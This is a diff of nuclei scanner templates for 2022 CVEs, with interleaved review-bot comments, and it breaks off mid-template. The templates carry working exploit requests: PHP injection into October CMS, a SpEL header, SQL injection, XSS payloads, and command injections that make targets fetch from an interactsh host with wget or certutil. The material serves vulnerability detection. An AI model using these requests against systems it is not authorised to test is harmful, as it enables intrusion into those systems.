@@ -1,109 +0,0 @@ -id: CVE-2022-21705 - -info: - name: October CMS - Remote Code Execution - author: iPhantasmic - severity: high - description: | - October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. - remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. - reference: - - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-21705 - cwe-id: CWE-74 - tags: cve,cve2022,authenticated,rce,cms,octobercms,injection - -requests: - - raw: - - | # to obtain session_key and token - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - - - | # to perform authentication and obtain admin cookies - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} - - - | # to inject php code in Markup editor and perform exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onSave - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - 
_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 - - - | # to obtain theme - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onCreateTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&type=page - - - | # to access the template page for generated exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onOpenTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - - cookie-reuse: true - - extractors: - - type: xpath - name: session_key - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - internal: true - # Obtain _session_key for current OctoberCMS session - - - type: xpath - name: token - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - internal: true - # Obtain _token for current OctoberCMS session - - - type: regex - name: theme - part: body - group: 1 - regex: - - '' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Contact Form 7" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-22536.yaml b/nuclei-templates/CVE-2022/cve-2022-22536.yaml
similarity index 100%
rename from nuclei-templates/CVE-2022/CVE-2022-22536.yaml
rename to nuclei-templates/CVE-2022/cve-2022-22536.yaml
diff --git a/nuclei-templates/CVE-2022/cve-2022-2290.yaml b/nuclei-templates/CVE-2022/cve-2022-2290.yaml
index 7840533def..dff0f8b418 100644
--- a/nuclei-templates/CVE-2022/cve-2022-2290.yaml
+++ b/nuclei-templates/CVE-2022/cve-2022-2290.yaml
@@ -5,22 +5,33 @@ info: author: dbrwsky severity: medium description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance. + remediation: | + Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - https://github.com/zadam/trilium - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2290 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 3 + vendor: trilium_project + product: trilium shodan-query: title:"Trilium Notes" - verified: "true" - tags: cve,cve2022,xss,trilium,huntr + tags: cve,cve2022,xss,trilium,huntr,trilium_project -requests: +http: - method: GET path: - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' @@ -28,9 +39,9 @@ requests: - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename' stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: 
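Review bot: The new `remediation` text names only 0.52.4 as the fixed release, while the description on the line above also lists 0.53.1-beta for the beta line; `Upgrade Trilium to 0.52.4 or later (0.53.1-beta or later on the beta line), which includes proper input sanitization.` keeps the two statements in step. `tags` now carries both `trilium` and `trilium_project`, and `vendor`/`product` already record the latter, so the added tag is noise. `max-request: 3` cannot be checked from these hunks because the path list is cut between them; the `http` block starts in the first hunk and ends beyond the second.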
@@ -46,5 +57,4 @@ requests: - type: status status: - 404 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a004730450221009f17fcdc98badc0464257c420fab598e7343e41d66382b910b98fd7005d968a0022040758dbc4500b3ca9aaa3096213583ee7175eb34c798a02991e0af55731a6641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-22963.yaml b/nuclei-templates/CVE-2022/cve-2022-22963.yaml deleted file mode 100644 index f0cceb1d51..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-22963.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-22963 - -info: - name: Spring Cloud Function SPEL RCE - author: Mr-xn,Adam Crosser - severity: critical - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - classification: - cve-id: CVE-2022-22963 - tags: cve,cve2022,springcloud,rce - -requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/cve-2022-22972.yaml b/nuclei-templates/CVE-2022/cve-2022-22972.yaml new file mode 100644 index 0000000000..2ceac3d1c7 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-22972.yaml 
@@ -0,0 +1,113 @@ +id: CVE-2022-22972 + +info: + name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass + author: For3stCo1d,princechaddha + severity: critical + description: | + VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. + remediation: | + Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). + reference: + - https://github.com/horizon3ai/CVE-2022-22972 + - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive + - https://www.vmware.com/security/advisories/VMSA-2022-0014.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22972 + cwe-id: CWE-287 + epss-score: 0.7146 + epss-percentile: 0.9778 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: vmware + product: identity_manager + fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + tags: cve2022,cve,vmware,auth-bypass,oast + +http: + - raw: + - | + GET /vcac/ HTTP/1.1 + Host: {{Hostname}} + - | + GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 + Host: {{Hostname}} + - | + POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 + Host: {{interactsh-url}} + Content-type: application/x-www-form-urlencoded + + 
protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in + + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 302 + + extractors: + - type: regex + name: protected_state + group: 1 + regex: + - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' + internal: true + part: body + + - type: regex + name: horizonRelayState + group: 1 + regex: + - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' + internal: true + part: body + + - type: regex + name: userstore + group: 1 + regex: + - 'id="userstore" value="([a-z.]+)" \/>' + internal: true + part: body + + - type: regex + name: userstoreDisplay + group: 1 + regex: + - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' + internal: true + part: body + + - type: regex + name: stickyConnectorId + group: 1 + regex: + - 'name="stickyConnectorId" value="(.*)"/>' + internal: true + part: body + + - type: kval + name: HZN-Cookie + kval: + - 'HZN' + part: header +# digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23134.yaml b/nuclei-templates/CVE-2022/cve-2022-23134.yaml index 53aca6a04f..6465ac9df7 100644 --- a/nuclei-templates/CVE-2022/cve-2022-23134.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-23134.yaml 
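Review bot: The last extractor (`type: kval`, `name: HZN-Cookie`) is the only one without `internal: true`, so the session cookie obtained through the bypass is written to scan results and any exported report; a live administrative session token should not land in findings storage, so either add `internal: true` or drop the extractor, since the `HZN=` header matcher already establishes the result. The `cpe` and `product` fields pin `identity_manager:3.3.3` while `name` and `description` cover Workspace ONE Access and vRealize Automation as well, which narrows CPE-based inventory matching to one product. The `remediation` line repeats the CVE id that `cve-id` already records.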
@@ -5,25 +5,41 @@ info: author: bananabr severity: medium description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration. + remediation: | + Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability. reference: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 + - https://support.zabbix.com/browse/ZBX-20384 + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ + - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2022-23134 - tags: cve,cve2022,zabbix,auth-bypass + cwe-id: CWE-287,CWE-284 + epss-score: 0.34559 + epss-percentile: 0.9671 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: zabbix + product: zabbix + tags: cve,cve2022,zabbix,auth-bypass,kev -requests: +http: - method: GET path: - "{{BaseURL}}/zabbix/setup.php" - "{{BaseURL}}/setup.php" + stop-at-first-match: true + headers: Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" - stop-at-first-match: true matchers-condition: and matchers: - type: word 
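Review bot: The added `impact` text speaks of "unauthorized access to sensitive information", but the vector kept on the following lines is `C:N/I:L/A:N`, i.e. integrity only, and the description itself only mentions changing the frontend configuration; `impact: | Successful exploitation allows an unauthenticated user to alter the Zabbix frontend setup configuration.` would agree with both. The `metadata` block gained `max-request`, `vendor` and `product` but no `verified` field, unlike the other templates touched in this commit; if the template was exercised against a vulnerable build, recording that helps triage of a `kev`-tagged finding. The moved `stop-at-first-match: true` is unchanged in effect.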
@@ -34,8 +50,15 @@ requests: - "Zabbix" condition: and + - type: word + words: + - "youtube_main" + - "support.google.com" + part: header + condition: and + negative: true + - type: status status: - 200 - -# Enhanced by mp on 2022/03/08 +# digest: 4b0a00483046022100e3fc17a46e63c043d37b84890ff55c7d3cf5f647c2885dc0484de21ac8fa5e260221008dda794693c6d89940aba0647527871cf1b59f9a8ac10fbeacf5f725abb667a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-23178.yaml b/nuclei-templates/CVE-2022/cve-2022-23178.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23178.yaml rename to nuclei-templates/CVE-2022/cve-2022-23178.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23347.yaml b/nuclei-templates/CVE-2022/cve-2022-23347.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23347.yaml rename to nuclei-templates/CVE-2022/cve-2022-23347.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-23779.yaml b/nuclei-templates/CVE-2022/cve-2022-23779.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-23779.yaml rename to nuclei-templates/CVE-2022/cve-2022-23779.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-23808.yaml b/nuclei-templates/CVE-2022/cve-2022-23808.yaml new file mode 100644 index 0000000000..4d9d63a2b9 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23808.yaml 
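Review bot: The new negative matcher pairs `condition: and` with `negative: true`, so a response is rejected only when its headers contain both `youtube_main` and `support.google.com`; a redirect carrying just one of them still counts as a hit. If the intent is to exclude anything that looks like a Google/YouTube response, `condition: or` is the right combinator; if the two strings are only ever seen together, a comment such as `# filters the Google/YouTube interstitial observed on non-Zabbix hosts` would explain the pairing. Either way this is a narrow false-positive patch, and a positive body check for setup-page-specific markers (the first matcher, cut off above this hunk, may already provide it) is the more robust guard.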
@@ -0,0 +1,60 @@ +id: CVE-2022-23808 + +info: + name: phpMyAdmin < 5.1.2 - Cross-Site Scripting + author: cckuailong,daffainfo + severity: medium + description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. + remediation: | + Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. + reference: + - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A + - https://github.com/dipakpanchal456/CVE-2022-23808 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 + - https://www.phpmyadmin.net/security/PMASA-2022-2/ + - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-23808 + cwe-id: CWE-79 + epss-score: 0.00743 + epss-percentile: 0.78912 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: phpmyadmin + product: phpmyadmin + shodan-query: http.component:"phpmyadmin" + tags: cve,cve2022,phpmyadmin,xss + +http: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\">" + - "

Add a new server

" + - "phpMyAdmin setup" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022038d5ba39a2b759095a3f8426c738ce15cf6c83b54e32b080e617ac13d733503a022100e570ecb30aa4d1b1fe02f8867294888554e1bb76b68135ab78cb7e93cf859e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23881.yaml b/nuclei-templates/CVE-2022/cve-2022-23881.yaml new file mode 100644 index 0000000000..31184f0103 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23881.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2022-23881 + +info: + name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution + author: pikpikcu + severity: critical + description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via danger_key() at zzz_template.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patch or upgrade to a patched version of ZZZCMS zzzphp. + reference: + - https://github.com/metaStor/Vuls/blob/main/zzzcms/zzzphp%20V2.1.0%20RCE/zzzphp%20V2.1.0%20RCE.md + - http://www.zzzcms.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-23881 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23881 + cwe-id: CWE-77 + epss-score: 0.16723 + epss-percentile: 0.95904 + cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zzzcms + product: zzzphp + tags: cve,cve2022,rce,zzzphp,zzzcms + +http: + - raw: + - | + GET /?location=search HTTP/1.1 + Host: {{Hostname}} + Cookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 500 +# digest: 490a0046304402206e4532e227dccab23d15511e741d5332c04c553aec092af6b3f824278ebd18c9022064325bd4ae46cc3b31537d917d6159428ee7cfe953375bb53aac8c2024b8ae2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-24112.yaml b/nuclei-templates/CVE-2022/cve-2022-24112.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-24112.yaml rename to nuclei-templates/CVE-2022/cve-2022-24112.yaml 
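Review bot: The matchers require both the OAST `http` interaction and `status: 500` under `matchers-condition: and`, so a callback that arrives while the page still renders with another status is discarded; the out-of-band interaction is the actual evidence, so the status check should either be dropped or documented as an observed side effect, e.g. `# the injected expression breaks template rendering, so a 500 accompanies the callback` if that is what testing showed. Two of the five references point at generic aggregator repositories (`kenzer-templates`, `cvemon`) rather than an advisory or fix, which adds little for triage.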
diff --git a/nuclei-templates/CVE-2022/cve-2022-24124.yaml b/nuclei-templates/CVE-2022/cve-2022-24124.yaml deleted file mode 100644 index f940ce92b6..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-24124.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2022-24124 - -info: - name: Casdoor 1.13.0 - Unauthenticated SQL Injection - author: cckuailong - severity: high - description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations. - reference: - - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html - - https://www.exploit-db.com/exploits/50792 - - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget - - https://nvd.nist.gov/vuln/detail/CVE-2022-24124 - metadata: - product: https://casdoor.org/ - shodan-query: http.title:"Casdoor" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-24124 - cwe-id: CWE-89 - tags: cve,cve2022,casdoor,sqli,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)" - - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "XPATH syntax error.*'" - - "casdoor" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-24260.yaml b/nuclei-templates/CVE-2022/cve-2022-24260.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-24260.yaml rename to nuclei-templates/CVE-2022/cve-2022-24260.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-24681.yaml b/nuclei-templates/CVE-2022/cve-2022-24681.yaml new file mode 100644 index 0000000000..1cd1c7e9e0 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24681.yaml 
@@ -0,0 +1,62 @@ +id: CVE-2022-24681 + +info: + name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting + author: Open-Sec + severity: medium + description: | + ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information. + remediation: | + Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. + reference: + - https://raxis.com/blog/cve-2022-24681 + - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 + - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24681 + cwe-id: CWE-79 + epss-score: 0.00155 + epss-percentile: 0.51848 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_adselfservice_plus + tags: cve,cve2022,manageengine,xss,authenticated,zohocorp + +http: + - raw: + - | + POST /servlet/GetProductVersion HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(buildnumber, '< 6121') + + - type: word + part: body + words: + - "ManageEngine" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: buildnumber + group: 1 + regex: + - '"BUILD_NUMBER":"([0-9]+)",' + internal: true + part: body +# digest: 
4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2022/cve-2022-2488.yaml b/nuclei-templates/CVE-2022/cve-2022-2488.yaml
new file mode 100644
index 0000000000..3f428bc088
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-2488.yaml
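Review bot: The template only POSTs to `/servlet/GetProductVersion` and compares the extracted `BUILD_NUMBER` with `< 6121`, so it is an unauthenticated version check rather than a confirmation of the stored XSS; the `authenticated` tag is therefore misleading and should be dropped, and a line `# version-based detection: flags builds below 6121 without exercising the XSS` above `http:` would set expectations for triage. The regex `'"BUILD_NUMBER":"([0-9]+)",'` depends on the trailing comma and silently fails to extract when that key is the last member of the JSON object, which then makes the `compare_versions` dsl evaluate against an empty value; anchoring on the key and digits alone is safer. `metadata` records no `verified` flag.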
@@ -0,0 +1,51 @@ +id: CVE-2022-2488 + +info: + name: Wavlink WN535K2/WN535K3 - OS Command Injection + author: For3stCo1d + severity: critical + description: | + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20touchlist_sync.cgi.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2488 + - https://vuldb.com/?id.204539 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2488 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2488 + cwe-id: CWE-78 + epss-score: 0.97392 + epss-percentile: 0.99908 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn535k2_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,iot,wavlink,router,rce,oast + +http: + - raw: + - | + GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: status + status: + - 500 +# digest: 4a0a004730450220356cde1b887b5746d09e420786e7774b8306e1e99f930120cb47996c24a275b2022100a3c3b2747f775e12938742f69218d9d03766d557418c26f563d6c42da95b6326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
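Review bot: The `cpe` and `product` fields cover only `wl-wn535k2_firmware`, while the name and description also list the WN535K3; if that model has its own CPE it should be added, otherwise the narrower metadata scope deserves a note in the description. The `matchers-condition: and` also requires HTTP status 500 alongside the OAST interaction, which is presumably the response seen on the reference setup; a comment on the status matcher recording that (e.g. `# 500 observed on vulnerable firmware; the interaction is the real signal`) would help when another firmware build answers differently and the check goes quiet.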
diff --git a/nuclei-templates/CVE-2022/cve-2022-24899.yaml b/nuclei-templates/CVE-2022/cve-2022-24899.yaml new file mode 100644 index 0000000000..ec78a7b42d --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24899.yaml 
@@ -0,0 +1,51 @@ +id: CVE-2022-24899 + +info: + name: Contao <4.13.3 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: As a workaround, users may disable canonical tags in the root page settings. + reference: + - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ + - https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2 + - https://nvd.nist.gov/vuln/detail/CVE-2022-24899 + - https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html + - https://github.com/contao/contao/commit/199206849a87ddd0fa5cf674eb3c58292fd8366c + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24899 + cwe-id: CWE-79 + epss-score: 0.00342 + epss-percentile: 0.70926 + cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: contao + product: contao + shodan-query: title:"Contao" + tags: cve,cve2022,contao,xss,huntr + +http: + - method: GET + path: + - "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: 